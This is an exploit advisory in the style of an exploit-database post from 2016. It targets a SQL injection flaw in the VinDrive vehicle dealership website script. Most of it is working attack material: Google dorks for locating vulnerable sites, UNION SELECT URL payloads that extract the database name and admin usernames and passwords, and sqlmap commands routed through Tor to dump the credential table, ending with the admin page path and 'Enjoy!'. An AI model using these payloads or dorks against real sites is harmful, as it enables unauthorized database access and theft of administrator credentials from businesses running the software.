0day VinDrive SQL Injecti0n Vulnerability - by JM511

1. in the name of Allah the beneficent the merciful
2. بسم الله الرحمن الرحيم
3. .
4. .
5. .
6. #####################################################################################################
7. # Exploit Title: [ VinDrive SQL Injecti0n Vulnerability - Manually AND sqlmap ]
8. #----------------------------------------------------------------------------------------------#
9. # Script Name: VinDrive - Vehicle Marketing System - Dealership website www.dealerwebsites.com
10. #----------------------------------------------------------------------------------------------#
11. #
12. # Date Tested: [2/17/2016]
13. # Author: [ JM511 Hacker ] EmaiL : [email protected] -::AUTHOR
14. # From : Saudi Arabia
15. # Home : www.T4em.com
16. # Twitter.com/JM511
17. #
18. #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
19. # Greeting to :
20. # AlQaTaRi || NoK511 || Cyber_511 || CNQ511 || Sarbot511 || Security511 || ALM511 || Abo SaMaRh 305 ||
21. # in3ctor Q8 || Strike * Alasmari! || PhaixaL || Kerelius[K] || 7moosh_123 || Scripts1337 || NB511
22. #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
23. #
24. # Platform / Tested on: [php]
25. # category: [SQL Injecti0n]
26. # d0rK g00gl3 :-
27. # 0x0- " allinurl:search/make_offer_form.php?id= "
28. # 0x1- " VinDrive inurl:/search/results.php "
29. # 0x2- " inurl:results.php?_s_col= "
30. # 0x3- " Google "
31. #
32. ######[ Exploit ]###### (( Manually ))
33.  
34. To See /column numbers : ( GONNA BE 3,4,5 <-- )
35.  
36. make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
37.  
38. To See /Database Name : ( Database Name will be : dealer62_XXX( SOMENAME )
39.  
40. make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
41.  
42. To See /Admin Username and Password : ( Replace XXXX with the name of data )
43. make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from dealer62_XXXX.cars_dealers
44.  
45. ----------- DONE -------------
46. ######[ Exploit ]###### (( SQLMAP ))
47.  
48. sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor --dbs
49.  
50. sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -D dealer62_XXXX --tables -T cars_dealers -C username,password --dump
51. ----------- DONE -------------
52.  
53. ADMIN PAGE :
54.  
55. http://www.TarGet/search/admin/
56.  
57. Enjoy !